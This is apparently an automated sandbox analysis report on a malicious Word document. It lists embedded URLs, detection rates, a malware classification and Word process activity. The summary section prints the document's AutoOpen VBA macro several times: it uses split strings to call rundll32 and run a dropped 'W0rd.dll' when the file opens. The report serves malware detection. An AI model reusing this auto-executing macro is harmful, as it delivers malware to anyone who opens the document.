    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://graph.windows.net/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://login.windows.local
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://management.azure.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://management.azure.com/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://messaging.office.com/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officeapps.live.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://onedrive.live.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office365.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://settings.outlook.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://tasks.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Document contains an embedded VBA macro which may execute processesShow sources
    Source: 1118_8732615.docOLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
    Source: 1118_8732615.docOLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
    Document contains an embedded VBA macro with suspicious stringsShow sources
    Source: 1118_8732615.docOLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
    Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpen, String shellexecute: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)Name: AutoOpen
    Source: 1118_8732615.docOLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
    Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpen, String shellexecute: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)Name: AutoOpen
    Source: 1118_8732615.docOLE, VBA macro line: Sub AutoOpen()
    Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
    Source: 1118_8732615.docOLE, VBA macro line: Sub AutoOpen()
    Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
    Source: 1118_8732615.docOLE indicator, VBA macros: true
    Source: 1118_8732615.docOLE indicator, VBA macros: true
    Source: classification engineClassification label: mal64.expl.winDOC@1/7@0/0
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{23B756EC-0D85-4B59-AD8D-4A31056962F4} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{23B756EC-0D85-4B59-AD8D-4A31056962F4} - OProcSessId.datJump to behavior
    Source: 1118_8732615.docOLE indicator, Word Document stream: true
    Source: 1118_8732615.docOLE indicator, Word Document stream: true
    Source: 1118_8732615.docOLE document summary: title field not present or empty
    Source: 1118_8732615.docOLE document summary: title field not present or empty
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: 1118_8732615.docVirustotal: Detection: 15%
    Source: 1118_8732615.docReversingLabs: Detection: 12%
    Source: 1118_8732615.docVirustotal: Detection: 15%
    Source: 1118_8732615.docReversingLabs: Detection: 12%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEAutomated click: OK
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEAutomated click: OK
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEAutomated click: OK
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: Binary string: c:\rockOne\Downmoney\tradeStart\gentle.pdb source: 1118_8732615.doc
    Source: Binary string: c:\rockOne\Downmoney\tradeStart\gentle.pdb source: 1118_8732615.doc
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
